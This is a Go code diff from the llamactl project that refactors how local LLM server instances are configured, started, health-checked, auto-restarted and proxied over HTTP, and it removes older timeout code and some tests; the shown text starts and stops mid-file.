"llamactl/pkg/backends"
"llamactl/pkg/backends/llamacpp"
"llamactl/pkg/backends/mlx"
"llamactl/pkg/backends/vllm"
"llamactl/pkg/config"
"log"
"maps"
"slices"
"sync"
)
type CreateInstanceOptions struct {
// Options contains the actual configuration (exported - this is the public API).
type Options struct {
// Auto restart
AutoRestart *bool `json:"auto_restart,omitempty"`
MaxRestarts *int `json:"max_restarts,omitempty"`
@@ -21,23 +20,79 @@ type CreateInstanceOptions struct {
OnDemandStart *bool `json:"on_demand_start,omitempty"`
// Idle timeout
IdleTimeout *int `json:"idle_timeout,omitempty"` // minutes
//Environment variables
// Environment variables
Environment map[string]string `json:"environment,omitempty"`
BackendType backends.BackendType `json:"backend_type"`
BackendOptions map[string]any `json:"backend_options,omitempty"`
// Backend-specific options
LlamaServerOptions *llamacpp.LlamaServerOptions `json:"-"`
MlxServerOptions *mlx.MlxServerOptions `json:"-"`
VllmServerOptions *vllm.VllmServerOptions `json:"-"`
// Assigned nodes
Nodes map[string]struct{} `json:"-"`
// Backend options
BackendOptions backends.Options `json:"-"`
}
// UnmarshalJSON implements custom JSON unmarshaling for CreateInstanceOptions
func (c *CreateInstanceOptions) UnmarshalJSON(data []byte) error {
// options wraps Options with thread-safe access (unexported).
type options struct {
mu sync.RWMutex
opts *Options
}
// newOptions creates a new options wrapper with the given Options
func newOptions(opts *Options) *options {
return &options{
opts: opts,
}
}
// get returns a copy of the current options
func (o *options) get() *Options {
o.mu.RLock()
defer o.mu.RUnlock()
return o.opts
}
// set updates the options
func (o *options) set(opts *Options) {
o.mu.Lock()
defer o.mu.Unlock()
o.opts = opts
}
func (o *options) GetHost() string {
o.mu.RLock()
defer o.mu.RUnlock()
return o.opts.BackendOptions.GetHost()
}
func (o *options) GetPort() int {
o.mu.RLock()
defer o.mu.RUnlock()
return o.opts.BackendOptions.GetPort()
}
// MarshalJSON implements json.Marshaler for options wrapper
func (o *options) MarshalJSON() ([]byte, error) {
o.mu.RLock()
defer o.mu.RUnlock()
return o.opts.MarshalJSON()
}
// UnmarshalJSON implements json.Unmarshaler for options wrapper
func (o *options) UnmarshalJSON(data []byte) error {
o.mu.Lock()
defer o.mu.Unlock()
if o.opts == nil {
o.opts = &Options{}
}
return o.opts.UnmarshalJSON(data)
}
// UnmarshalJSON implements custom JSON unmarshaling for Options
func (c *Options) UnmarshalJSON(data []byte) error {
// Use anonymous struct to avoid recursion
type Alias CreateInstanceOptions
type Alias Options
aux := &struct {
Nodes []string `json:"nodes,omitempty"`
BackendType backends.BackendType `json:"backend_type"`
BackendOptions map[string]any `json:"backend_options,omitempty"`
*Alias
}{
Alias: (*Alias)(c),
@@ -47,113 +102,88 @@ func (c *CreateInstanceOptions) UnmarshalJSON(data []byte) error {
return err
}
// Parse backend-specific options
switch c.BackendType {
case backends.BackendTypeLlamaCpp:
if c.BackendOptions != nil {
// Convert map to JSON and then unmarshal to LlamaServerOptions
optionsData, err := json.Marshal(c.BackendOptions)
if err != nil {
return fmt.Errorf("failed to marshal backend options: %w", err)
}
c.LlamaServerOptions = &llamacpp.LlamaServerOptions{}
if err := json.Unmarshal(optionsData, c.LlamaServerOptions); err != nil {
return fmt.Errorf("failed to unmarshal llama.cpp options: %w", err)
}
// Convert nodes array to map
if len(aux.Nodes) > 0 {
c.Nodes = make(map[string]struct{}, len(aux.Nodes))
for _, node := range aux.Nodes {
c.Nodes[node] = struct{}{}
}
case backends.BackendTypeMlxLm:
if c.BackendOptions != nil {
optionsData, err := json.Marshal(c.BackendOptions)
if err != nil {
return fmt.Errorf("failed to marshal backend options: %w", err)
}
}
c.MlxServerOptions = &mlx.MlxServerOptions{}
if err := json.Unmarshal(optionsData, c.MlxServerOptions); err != nil {
return fmt.Errorf("failed to unmarshal MLX options: %w", err)
}
}
case backends.BackendTypeVllm:
if c.BackendOptions != nil {
optionsData, err := json.Marshal(c.BackendOptions)
if err != nil {
return fmt.Errorf("failed to marshal backend options: %w", err)
}
// Create backend options struct and unmarshal
c.BackendOptions = backends.Options{
BackendType: aux.BackendType,
BackendOptions: aux.BackendOptions,
}
c.VllmServerOptions = &vllm.VllmServerOptions{}
if err := json.Unmarshal(optionsData, c.VllmServerOptions); err != nil {
return fmt.Errorf("failed to unmarshal vLLM options: %w", err)
}
}
default:
return fmt.Errorf("unknown backend type: %s", c.BackendType)
// Marshal the backend options to JSON for proper unmarshaling
backendJson, err := json.Marshal(struct {
BackendType backends.BackendType `json:"backend_type"`
BackendOptions map[string]any `json:"backend_options,omitempty"`
}{
BackendType: aux.BackendType,
BackendOptions: aux.BackendOptions,
})
if err != nil {
return fmt.Errorf("failed to marshal backend options: %w", err)
}
// Unmarshal into the backends.Options struct to trigger its custom unmarshaling
if err := json.Unmarshal(backendJson, &c.BackendOptions); err != nil {
return fmt.Errorf("failed to unmarshal backend options: %w", err)
}
return nil
}
// MarshalJSON implements custom JSON marshaling for CreateInstanceOptions
func (c *CreateInstanceOptions) MarshalJSON() ([]byte, error) {
// MarshalJSON implements custom JSON marshaling for Options
func (c *Options) MarshalJSON() ([]byte, error) {
// Use anonymous struct to avoid recursion
type Alias CreateInstanceOptions
type Alias Options
aux := struct {
Nodes []string `json:"nodes,omitempty"` // Output as JSON array
BackendType backends.BackendType `json:"backend_type"`
BackendOptions map[string]any `json:"backend_options,omitempty"`
*Alias
}{
Alias: (*Alias)(c),
}
// Convert backend-specific options back to BackendOptions map for JSON
switch c.BackendType {
case backends.BackendTypeLlamaCpp:
if c.LlamaServerOptions != nil {
data, err := json.Marshal(c.LlamaServerOptions)
if err != nil {
return nil, fmt.Errorf("failed to marshal llama server options: %w", err)
}
var backendOpts map[string]any
if err := json.Unmarshal(data, &backendOpts); err != nil {
return nil, fmt.Errorf("failed to unmarshal to map: %w", err)
}
aux.BackendOptions = backendOpts
}
case backends.BackendTypeMlxLm:
if c.MlxServerOptions != nil {
data, err := json.Marshal(c.MlxServerOptions)
if err != nil {
return nil, fmt.Errorf("failed to marshal MLX server options: %w", err)
}
var backendOpts map[string]any
if err := json.Unmarshal(data, &backendOpts); err != nil {
return nil, fmt.Errorf("failed to unmarshal to map: %w", err)
}
aux.BackendOptions = backendOpts
}
case backends.BackendTypeVllm:
if c.VllmServerOptions != nil {
data, err := json.Marshal(c.VllmServerOptions)
if err != nil {
return nil, fmt.Errorf("failed to marshal vLLM server options: %w", err)
}
var backendOpts map[string]any
if err := json.Unmarshal(data, &backendOpts); err != nil {
return nil, fmt.Errorf("failed to unmarshal to map: %w", err)
}
aux.BackendOptions = backendOpts
// Convert nodes map to array (sorted for consistency)
if len(c.Nodes) > 0 {
aux.Nodes = make([]string, 0, len(c.Nodes))
for node := range c.Nodes {
aux.Nodes = append(aux.Nodes, node)
}
// Sort for consistent output
slices.Sort(aux.Nodes)
}
// Set backend type
aux.BackendType = c.BackendOptions.BackendType
// Marshal the backends.Options struct to get the properly formatted backend options
// Marshal a pointer to trigger the pointer receiver MarshalJSON method
backendData, err := json.Marshal(&c.BackendOptions)
if err != nil {
return nil, fmt.Errorf("failed to marshal backend options: %w", err)
}
// Unmarshal into a temporary struct to extract the backend_options map
var tempBackend struct {
BackendOptions map[string]any `json:"backend_options,omitempty"`
}
if err := json.Unmarshal(backendData, &tempBackend); err != nil {
return nil, fmt.Errorf("failed to unmarshal backend data: %w", err)
}
aux.BackendOptions = tempBackend.BackendOptions
return json.Marshal(aux)
}
// ValidateAndApplyDefaults validates the instance options and applies constraints
func (c *CreateInstanceOptions) ValidateAndApplyDefaults(name string, globalSettings *config.InstancesConfig) {
// validateAndApplyDefaults validates the instance options and applies constraints
func (c *Options) validateAndApplyDefaults(name string, globalSettings *config.InstancesConfig) {
// Validate and apply constraints
if c.MaxRestarts != nil && *c.MaxRestarts < 0 {
log.Printf("Instance %s MaxRestarts value (%d) cannot be negative, setting to 0", name, *c.MaxRestarts)
@@ -190,76 +220,3 @@ func (c *CreateInstanceOptions) ValidateAndApplyDefaults(name string, globalSett
}
}
}
func (c *CreateInstanceOptions) GetCommand(backendConfig *config.BackendSettings) string {
if backendConfig.Docker != nil && backendConfig.Docker.Enabled && c.BackendType != backends.BackendTypeMlxLm {
return "docker"
}
return backendConfig.Command
}
// BuildCommandArgs builds command line arguments for the backend
func (c *CreateInstanceOptions) BuildCommandArgs(backendConfig *config.BackendSettings) []string {
var args []string
if backendConfig.Docker != nil && backendConfig.Docker.Enabled && c.BackendType != backends.BackendTypeMlxLm {
// For Docker, start with Docker args
args = append(args, backendConfig.Docker.Args...)
args = append(args, backendConfig.Docker.Image)
switch c.BackendType {
case backends.BackendTypeLlamaCpp:
if c.LlamaServerOptions != nil {
args = append(args, c.LlamaServerOptions.BuildDockerArgs()...)
}
case backends.BackendTypeVllm:
if c.VllmServerOptions != nil {
args = append(args, c.VllmServerOptions.BuildDockerArgs()...)
}
}
} else {
// For native execution, start with backend args
args = append(args, backendConfig.Args...)
switch c.BackendType {
case backends.BackendTypeLlamaCpp:
if c.LlamaServerOptions != nil {
args = append(args, c.LlamaServerOptions.BuildCommandArgs()...)
}
case backends.BackendTypeMlxLm:
if c.MlxServerOptions != nil {
args = append(args, c.MlxServerOptions.BuildCommandArgs()...)
}
case backends.BackendTypeVllm:
if c.VllmServerOptions != nil {
args = append(args, c.VllmServerOptions.BuildCommandArgs()...)
}
}
}
return args
}
func (c *CreateInstanceOptions) BuildEnvironment(backendConfig *config.BackendSettings) map[string]string {
env := map[string]string{}
if backendConfig.Environment != nil {
maps.Copy(env, backendConfig.Environment)
}
if backendConfig.Docker != nil && backendConfig.Docker.Enabled && c.BackendType != backends.BackendTypeMlxLm {
if backendConfig.Docker.Environment != nil {
maps.Copy(env, backendConfig.Docker.Environment)
}
}
if c.Environment != nil {
maps.Copy(env, c.Environment)
}
return env
}

428
pkg/instance/process.go Normal file
View File

@@ -0,0 +1,428 @@
package instance
import (
"context"
"fmt"
"io"
"log"
"net/http"
"os"
"os/exec"
"runtime"
"sync"
"syscall"
"time"
)
// process manages the OS process lifecycle for a local instance.
// process owns its complete lifecycle including auto-restart logic.
type process struct {
instance *Instance // Back-reference for SetStatus, GetOptions
mu sync.RWMutex
cmd *exec.Cmd
ctx context.Context
cancel context.CancelFunc
stdout io.ReadCloser
stderr io.ReadCloser
restarts int
restartCancel context.CancelFunc
monitorDone chan struct{}
}
// newProcess creates a new process component for the given instance
func newProcess(instance *Instance) *process {
return &process{
instance: instance,
}
}
// start starts the OS process and returns an error if it fails.
func (p *process) start() error {
p.mu.Lock()
defer p.mu.Unlock()
if p.instance.IsRunning() {
return fmt.Errorf("instance %s is already running", p.instance.Name)
}
// Safety check: ensure options are valid
if p.instance.options == nil {
return fmt.Errorf("instance %s has no options set", p.instance.Name)
}
// Reset restart counter when manually starting (not during auto-restart)
// We can detect auto-restart by checking if restartCancel is set
if p.restartCancel == nil {
p.restarts = 0
}
// Initialize last request time to current time when starting
if p.instance.proxy != nil {
p.instance.proxy.updateLastRequestTime()
}
// Create context before building command (needed for CommandContext)
p.ctx, p.cancel = context.WithCancel(context.Background())
// Create log files
if err := p.instance.logger.create(); err != nil {
return fmt.Errorf("failed to create log files: %w", err)
}
// Build command using backend-specific methods
cmd, cmdErr := p.buildCommand()
if cmdErr != nil {
return fmt.Errorf("failed to build command: %w", cmdErr)
}
p.cmd = cmd
if runtime.GOOS != "windows" {
setProcAttrs(p.cmd)
}
var err error
p.stdout, err = p.cmd.StdoutPipe()
if err != nil {
p.instance.logger.close()
return fmt.Errorf("failed to get stdout pipe: %w", err)
}
p.stderr, err = p.cmd.StderrPipe()
if err != nil {
p.stdout.Close()
p.instance.logger.close()
return fmt.Errorf("failed to get stderr pipe: %w", err)
}
if err := p.cmd.Start(); err != nil {
return fmt.Errorf("failed to start instance %s: %w", p.instance.Name, err)
}
p.instance.SetStatus(Running)
// Create channel for monitor completion signaling
p.monitorDone = make(chan struct{})
go p.instance.logger.readOutput(p.stdout)
go p.instance.logger.readOutput(p.stderr)
go p.monitorProcess()
return nil
}
// stop terminates the subprocess without restarting
func (p *process) stop() error {
p.mu.Lock()
if !p.instance.IsRunning() {
// Even if not running, cancel any pending restart
if p.restartCancel != nil {
p.restartCancel()
p.restartCancel = nil
log.Printf("Cancelled pending restart for instance %s", p.instance.Name)
}
p.mu.Unlock()
return fmt.Errorf("instance %s is not running", p.instance.Name)
}
// Cancel any pending restart
if p.restartCancel != nil {
p.restartCancel()
p.restartCancel = nil
}
// Set status to ShuttingDown first to reject new requests
p.instance.SetStatus(ShuttingDown)
// Get the monitor done channel before releasing the lock
monitorDone := p.monitorDone
p.mu.Unlock()
// Wait for inflight requests to complete (max 30 seconds)
log.Printf("Instance %s shutting down, waiting for inflight requests to complete...", p.instance.Name)
deadline := time.Now().Add(30 * time.Second)
for time.Now().Before(deadline) {
inflight := p.instance.GetInflightRequests()
if inflight == 0 {
break
}
time.Sleep(100 * time.Millisecond)
}
// Now set status to stopped to signal intentional stop
p.instance.SetStatus(Stopped)
// Stop the process with SIGINT if cmd exists
if p.cmd != nil && p.cmd.Process != nil {
if err := p.cmd.Process.Signal(syscall.SIGINT); err != nil {
log.Printf("Failed to send SIGINT to instance %s: %v", p.instance.Name, err)
}
}
// If no process exists, we can return immediately
if p.cmd == nil || monitorDone == nil {
p.instance.logger.close()
return nil
}
select {
case <-monitorDone:
// Process exited normally
log.Printf("Instance %s shut down gracefully", p.instance.Name)
case <-time.After(30 * time.Second):
// Force kill if it doesn't exit within 30 seconds
if p.cmd != nil && p.cmd.Process != nil {
killErr := p.cmd.Process.Kill()
if killErr != nil {
log.Printf("Failed to force kill instance %s: %v", p.instance.Name, killErr)
}
log.Printf("Instance %s did not stop in time, force killed", p.instance.Name)
// Wait a bit more for the monitor to finish after force kill
select {
case <-monitorDone:
// Monitor completed after force kill
case <-time.After(2 * time.Second):
log.Printf("Warning: Monitor goroutine did not complete after force kill for instance %s", p.instance.Name)
}
}
}
p.instance.logger.close()
return nil
}
// restart manually restarts the process (resets restart counter)
func (p *process) restart() error {
// Stop the process first
if err := p.stop(); err != nil {
// If it's not running, that's ok - we'll just start it
if err.Error() != fmt.Sprintf("instance %s is not running", p.instance.Name) {
return fmt.Errorf("failed to stop instance during restart: %w", err)
}
}
// Reset restart counter for manual restart
p.mu.Lock()
p.restarts = 0
p.mu.Unlock()
// Start the process
return p.start()
}
// waitForHealthy waits for the process to become healthy
func (p *process) waitForHealthy(timeout int) error {
if !p.instance.IsRunning() {
return fmt.Errorf("instance %s is not running", p.instance.Name)
}
if timeout <= 0 {
timeout = 30 // Default to 30 seconds if no timeout is specified
}
ctx, cancel := context.WithTimeout(context.Background(), time.Duration(timeout)*time.Second)
defer cancel()
// Get host/port from instance
host := p.instance.options.GetHost()
port := p.instance.options.GetPort()
healthURL := fmt.Sprintf("http://%s:%d/health", host, port)
// Create a dedicated HTTP client for health checks
client := &http.Client{
Timeout: 5 * time.Second, // 5 second timeout per request
}
// Helper function to check health directly
checkHealth := func() bool {
req, err := http.NewRequestWithContext(ctx, "GET", healthURL, nil)
if err != nil {
return false
}
resp, err := client.Do(req)
if err != nil {
return false
}
defer resp.Body.Close()
return resp.StatusCode == http.StatusOK
}
// Try immediate check first
if checkHealth() {
return nil // Instance is healthy
}
// If immediate check failed, start polling
ticker := time.NewTicker(1 * time.Second)
defer ticker.Stop()
for {
select {
case <-ctx.Done():
return fmt.Errorf("timeout waiting for instance %s to become healthy after %d seconds", p.instance.Name, timeout)
case <-ticker.C:
if checkHealth() {
return nil // Instance is healthy
}
// Continue polling
}
}
}
// monitorProcess monitors the OS process and handles crashes/exits
func (p *process) monitorProcess() {
defer func() {
p.mu.Lock()
if p.monitorDone != nil {
close(p.monitorDone)
p.monitorDone = nil
}
p.mu.Unlock()
}()
err := p.cmd.Wait()
p.mu.Lock()
// Check if the instance was intentionally stopped
if !p.instance.IsRunning() {
p.mu.Unlock()
return
}
p.instance.SetStatus(Stopped)
p.instance.logger.close()
// Cancel any existing restart context since we're handling a new exit
if p.restartCancel != nil {
p.restartCancel()
p.restartCancel = nil
}
// Log the exit
if err != nil {
log.Printf("Instance %s crashed with error: %v", p.instance.Name, err)
// Handle auto-restart logic
p.handleAutoRestart(err)
} else {
log.Printf("Instance %s exited cleanly", p.instance.Name)
p.mu.Unlock()
}
}
// shouldAutoRestart checks if the process should auto-restart
func (p *process) shouldAutoRestart() bool {
opts := p.instance.GetOptions()
if opts == nil {
log.Printf("Instance %s not restarting: options are nil", p.instance.Name)
return false
}
if opts.AutoRestart == nil || !*opts.AutoRestart {
log.Printf("Instance %s not restarting: AutoRestart is disabled", p.instance.Name)
return false
}
if opts.MaxRestarts == nil {
log.Printf("Instance %s not restarting: MaxRestarts is nil", p.instance.Name)
return false
}
maxRestarts := *opts.MaxRestarts
if p.restarts >= maxRestarts {
log.Printf("Instance %s exceeded max restart attempts (%d)", p.instance.Name, maxRestarts)
return false
}
return true
}
// handleAutoRestart manages the auto-restart process
func (p *process) handleAutoRestart(err error) {
// Check if should restart
if !p.shouldAutoRestart() {
p.instance.SetStatus(Failed)
p.mu.Unlock()
return
}
// Get restart parameters
opts := p.instance.GetOptions()
if opts.RestartDelay == nil {
log.Printf("Instance %s not restarting: RestartDelay is nil", p.instance.Name)
p.instance.SetStatus(Failed)
p.mu.Unlock()
return
}
restartDelay := *opts.RestartDelay
maxRestarts := *opts.MaxRestarts
p.restarts++
// Set status to Restarting instead of leaving as Stopped
p.instance.SetStatus(Restarting)
log.Printf("Auto-restarting instance %s (attempt %d/%d) in %v",
p.instance.Name, p.restarts, maxRestarts, time.Duration(restartDelay)*time.Second)
// Create a cancellable context for the restart delay
restartCtx, cancel := context.WithCancel(context.Background())
p.restartCancel = cancel
// Release the lock before sleeping
p.mu.Unlock()
// Use context-aware sleep so it can be cancelled
select {
case <-time.After(time.Duration(restartDelay) * time.Second):
// Sleep completed normally, continue with restart
case <-restartCtx.Done():
// Restart was cancelled
log.Printf("Restart cancelled for instance %s", p.instance.Name)
return
}
// Restart the instance
if err := p.start(); err != nil {
log.Printf("Failed to restart instance %s: %v", p.instance.Name, err)
} else {
log.Printf("Successfully restarted instance %s", p.instance.Name)
// Clear the cancel function
p.mu.Lock()
p.restartCancel = nil
p.mu.Unlock()
}
}
// buildCommand builds the command to execute using backend-specific logic
func (p *process) buildCommand() (*exec.Cmd, error) {
// Build the environment variables
env := p.instance.buildEnvironment()
// Get the command to execute
command := p.instance.getCommand()
// Build command arguments
args := p.instance.buildCommandArgs()
// Create the exec.Cmd
cmd := exec.CommandContext(p.ctx, command, args...)
// Start with host environment variables
cmd.Env = os.Environ()
// Add/override with backend-specific environment variables
for k, v := range env {
cmd.Env = append(cmd.Env, fmt.Sprintf("%s=%s", k, v))
}
return cmd, nil
}

234
pkg/instance/proxy.go Normal file
View File

@@ -0,0 +1,234 @@
package instance
import (
"fmt"
"net/http"
"net/http/httputil"
"net/url"
"sync"
"sync/atomic"
"time"
)
// TimeProvider interface allows for testing with mock time
type TimeProvider interface {
Now() time.Time
}
// realTimeProvider implements TimeProvider using the actual time
type realTimeProvider struct{}
func (realTimeProvider) Now() time.Time {
return time.Now()
}
// proxy manages HTTP reverse proxy and request tracking for an instance.
type proxy struct {
instance *Instance
targetURL *url.URL
apiKey string // For remote instances
responseHeaders map[string]string
mu sync.RWMutex
proxy *httputil.ReverseProxy
proxyOnce sync.Once
proxyErr error
lastRequestTime atomic.Int64
inflightRequests atomic.Int32
timeProvider TimeProvider
}
// newProxy creates a new Proxy for the given instance
func newProxy(instance *Instance) (*proxy, error) {
p := &proxy{
instance: instance,
timeProvider: realTimeProvider{},
}
var err error
options := instance.GetOptions()
if options == nil {
return nil, fmt.Errorf("instance %s has no options set", instance.Name)
}
if instance.IsRemote() {
// Take the first remote node as the target for now
var nodeName string
for node := range options.Nodes {
nodeName = node
break
}
if nodeName == "" {
return nil, fmt.Errorf("instance %s has no remote nodes defined", p.instance.Name)
}
node, ok := p.instance.globalNodesConfig[nodeName]
if !ok {
return nil, fmt.Errorf("remote node %s is not defined", nodeName)
}
p.targetURL, err = url.Parse(node.Address)
if err != nil {
return nil, fmt.Errorf("failed to parse target URL for remote instance %s: %w", p.instance.Name, err)
}
p.apiKey = node.APIKey
} else {
// Get host/port from process
host := p.instance.options.GetHost()
port := p.instance.options.GetPort()
if port == 0 {
return nil, fmt.Errorf("instance %s has no port assigned", p.instance.Name)
}
p.targetURL, err = url.Parse(fmt.Sprintf("http://%s:%d", host, port))
if err != nil {
return nil, fmt.Errorf("failed to parse target URL for instance %s: %w", p.instance.Name, err)
}
// Get response headers from backend config
p.responseHeaders = options.BackendOptions.GetResponseHeaders(p.instance.globalBackendSettings)
}
return p, nil
}
// get returns the reverse proxy for this instance, creating it if needed.
// Uses sync.Once to ensure thread-safe one-time initialization.
func (p *proxy) get() (*httputil.ReverseProxy, error) {
// sync.Once guarantees buildProxy() is called exactly once
// Other callers block until first initialization completes
p.proxyOnce.Do(func() {
p.proxy, p.proxyErr = p.build()
})
return p.proxy, p.proxyErr
}
// build creates the reverse proxy based on instance options
func (p *proxy) build() (*httputil.ReverseProxy, error) {
proxy := httputil.NewSingleHostReverseProxy(p.targetURL)
// Modify the request before sending it to the backend
originalDirector := proxy.Director
proxy.Director = func(req *http.Request) {
originalDirector(req)
// Add API key header for remote instances
if p.instance.IsRemote() && p.apiKey != "" {
req.Header.Set("Authorization", "Bearer "+p.apiKey)
}
// Update last request time
p.updateLastRequestTime()
}
if !p.instance.IsRemote() {
// Add custom headers to the request
proxy.ModifyResponse = func(resp *http.Response) error {
// Remove CORS headers from backend response to avoid conflicts
// llamactl will add its own CORS headers
resp.Header.Del("Access-Control-Allow-Origin")
resp.Header.Del("Access-Control-Allow-Methods")
resp.Header.Del("Access-Control-Allow-Headers")
resp.Header.Del("Access-Control-Allow-Credentials")
resp.Header.Del("Access-Control-Max-Age")
resp.Header.Del("Access-Control-Expose-Headers")
for key, value := range p.responseHeaders {
resp.Header.Set(key, value)
}
return nil
}
}
return proxy, nil
}
// serveHTTP handles HTTP requests with inflight tracking
func (p *proxy) serveHTTP(w http.ResponseWriter, r *http.Request) error {
// Get the reverse proxy
reverseProxy, err := p.get()
if err != nil {
return err
}
// Track inflight requests
p.incInflightRequests()
defer p.decInflightRequests()
// Serve the request
reverseProxy.ServeHTTP(w, r)
return nil
}
// clear resets the proxy, allowing it to be recreated when options change.
func (p *proxy) clear() {
p.mu.Lock()
defer p.mu.Unlock()
p.proxy = nil
p.proxyErr = nil
p.proxyOnce = sync.Once{}
}
// updateLastRequestTime updates the last request access time for the instance
func (p *proxy) updateLastRequestTime() {
lastRequestTime := p.timeProvider.Now().Unix()
p.lastRequestTime.Store(lastRequestTime)
}
// getLastRequestTime returns the last request time as a Unix timestamp
func (p *proxy) getLastRequestTime() int64 {
return p.lastRequestTime.Load()
}
// shouldTimeout checks if the instance should timeout based on idle time
func (p *proxy) shouldTimeout() bool {
if !p.instance.IsRunning() {
return false
}
options := p.instance.GetOptions()
if options == nil || options.IdleTimeout == nil || *options.IdleTimeout <= 0 {
return false
}
// Check if the last request time exceeds the idle timeout
lastRequest := p.lastRequestTime.Load()
idleTimeoutMinutes := *options.IdleTimeout
// Convert timeout from minutes to seconds for comparison
idleTimeoutSeconds := int64(idleTimeoutMinutes * 60)
return (p.timeProvider.Now().Unix() - lastRequest) > idleTimeoutSeconds
}
// setTimeProvider sets a custom time provider for testing
func (p *proxy) setTimeProvider(tp TimeProvider) {
p.timeProvider = tp
}
// incInflightRequests increments the inflight request counter
func (p *proxy) incInflightRequests() {
p.inflightRequests.Add(1)
}
// decInflightRequests decrements the inflight request counter
func (p *proxy) decInflightRequests() {
p.inflightRequests.Add(-1)
}
// getInflightRequests returns the current number of inflight requests
func (p *proxy) getInflightRequests() int32 {
return p.inflightRequests.Load()
}

View File

@@ -3,48 +3,38 @@ package instance
import (
"encoding/json"
"log"
"sync"
)
// Enum for instance status
type InstanceStatus int
// Status is the enum for status values (exported).
type Status int
const (
Stopped InstanceStatus = iota
Stopped Status = iota
Running
Failed
Restarting
ShuttingDown
)
var nameToStatus = map[string]InstanceStatus{
"stopped": Stopped,
"running": Running,
"failed": Failed,
var nameToStatus = map[string]Status{
"stopped": Stopped,
"running": Running,
"failed": Failed,
"restarting": Restarting,
"shutting_down": ShuttingDown,
}
var statusToName = map[InstanceStatus]string{
Stopped: "stopped",
Running: "running",
Failed: "failed",
var statusToName = map[Status]string{
Stopped: "stopped",
Running: "running",
Failed: "failed",
Restarting: "restarting",
ShuttingDown: "shutting_down",
}
func (p *Process) SetStatus(status InstanceStatus) {
oldStatus := p.Status
p.Status = status
if p.onStatusChange != nil {
p.onStatusChange(oldStatus, status)
}
}
func (p *Process) GetStatus() InstanceStatus {
return p.Status
}
// IsRunning returns true if the status is Running
func (p *Process) IsRunning() bool {
return p.Status == Running
}
func (s InstanceStatus) MarshalJSON() ([]byte, error) {
// Status enum JSON marshaling methods
func (s Status) MarshalJSON() ([]byte, error) {
name, ok := statusToName[s]
if !ok {
name = "stopped" // Default to "stopped" for unknown status
@@ -52,8 +42,8 @@ func (s InstanceStatus) MarshalJSON() ([]byte, error) {
return json.Marshal(name)
}
// UnmarshalJSON implements json.Unmarshaler
func (s *InstanceStatus) UnmarshalJSON(data []byte) error {
// UnmarshalJSON implements json.Unmarshaler for Status enum
func (s *Status) UnmarshalJSON(data []byte) error {
var str string
if err := json.Unmarshal(data, &str); err != nil {
return err
@@ -68,3 +58,61 @@ func (s *InstanceStatus) UnmarshalJSON(data []byte) error {
*s = status
return nil
}
// status represents the instance status with thread-safe access (unexported).
type status struct {
mu sync.RWMutex
s Status
// Callback for status changes
onStatusChange func(oldStatus, newStatus Status)
}
// newStatus creates a new status wrapper with the given initial status
func newStatus(initial Status) *status {
return &status{
s: initial,
}
}
// get returns the current status
func (st *status) get() Status {
st.mu.RLock()
defer st.mu.RUnlock()
return st.s
}
// set updates the status and triggers the onStatusChange callback if set
func (st *status) set(newStatus Status) {
st.mu.Lock()
oldStatus := st.s
st.s = newStatus
callback := st.onStatusChange
st.mu.Unlock()
// Call the callback outside the lock to avoid potential deadlocks
if callback != nil {
callback(oldStatus, newStatus)
}
}
// isRunning returns true if the status is Running
func (st *status) isRunning() bool {
st.mu.RLock()
defer st.mu.RUnlock()
return st.s == Running
}
// MarshalJSON implements json.Marshaler for status wrapper
func (st *status) MarshalJSON() ([]byte, error) {
st.mu.RLock()
defer st.mu.RUnlock()
return st.s.MarshalJSON()
}
// UnmarshalJSON implements json.Unmarshaler for status wrapper
func (st *status) UnmarshalJSON(data []byte) error {
st.mu.Lock()
defer st.mu.Unlock()
return st.s.UnmarshalJSON(data)
}

View File

@@ -1,28 +0,0 @@
package instance
// UpdateLastRequestTime updates the last request access time for the instance via proxy
func (i *Process) UpdateLastRequestTime() {
i.mu.Lock()
defer i.mu.Unlock()
lastRequestTime := i.timeProvider.Now().Unix()
i.lastRequestTime.Store(lastRequestTime)
}
func (i *Process) ShouldTimeout() bool {
i.mu.RLock()
defer i.mu.RUnlock()
if !i.IsRunning() || i.options.IdleTimeout == nil || *i.options.IdleTimeout <= 0 {
return false
}
// Check if the last request time exceeds the idle timeout
lastRequest := i.lastRequestTime.Load()
idleTimeoutMinutes := *i.options.IdleTimeout
// Convert timeout from minutes to seconds for comparison
idleTimeoutSeconds := int64(idleTimeoutMinutes * 60)
return (i.timeProvider.Now().Unix() - lastRequest) > idleTimeoutSeconds
}

View File

@@ -1,274 +0,0 @@
package instance_test
import (
"llamactl/pkg/backends"
"llamactl/pkg/backends/llamacpp"
"llamactl/pkg/config"
"llamactl/pkg/instance"
"llamactl/pkg/testutil"
"sync/atomic"
"testing"
"time"
)
// MockTimeProvider implements TimeProvider for testing
type MockTimeProvider struct {
currentTime atomic.Int64 // Unix timestamp
}
func NewMockTimeProvider(t time.Time) *MockTimeProvider {
m := &MockTimeProvider{}
m.currentTime.Store(t.Unix())
return m
}
func (m *MockTimeProvider) Now() time.Time {
return time.Unix(m.currentTime.Load(), 0)
}
func (m *MockTimeProvider) SetTime(t time.Time) {
m.currentTime.Store(t.Unix())
}
// Timeout-related tests
func TestUpdateLastRequestTime(t *testing.T) {
backendConfig := &config.BackendConfig{
LlamaCpp: config.BackendSettings{
Command: "llama-server",
},
MLX: config.BackendSettings{
Command: "mlx_lm.server",
},
}
globalSettings := &config.InstancesConfig{
LogsDir: "/tmp/test",
}
options := &instance.CreateInstanceOptions{
BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: &llamacpp.LlamaServerOptions{
Model: "/path/to/model.gguf",
},
}
// Mock onStatusChange function
mockOnStatusChange := func(oldStatus, newStatus instance.InstanceStatus) {}
inst := instance.NewInstance("test-instance", backendConfig, globalSettings, options, mockOnStatusChange)
// Test that UpdateLastRequestTime doesn't panic
inst.UpdateLastRequestTime()
}
func TestShouldTimeout_NotRunning(t *testing.T) {
backendConfig := &config.BackendConfig{
LlamaCpp: config.BackendSettings{
Command: "llama-server",
},
MLX: config.BackendSettings{
Command: "mlx_lm.server",
},
}
globalSettings := &config.InstancesConfig{
LogsDir: "/tmp/test",
}
idleTimeout := 1 // 1 minute
options := &instance.CreateInstanceOptions{
IdleTimeout: &idleTimeout,
BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: &llamacpp.LlamaServerOptions{
Model: "/path/to/model.gguf",
},
}
// Mock onStatusChange function
mockOnStatusChange := func(oldStatus, newStatus instance.InstanceStatus) {}
inst := instance.NewInstance("test-instance", backendConfig, globalSettings, options, mockOnStatusChange)
// Instance is not running, should not timeout regardless of configuration
if inst.ShouldTimeout() {
t.Error("Non-running instance should never timeout")
}
}
func TestShouldTimeout_NoTimeoutConfigured(t *testing.T) {
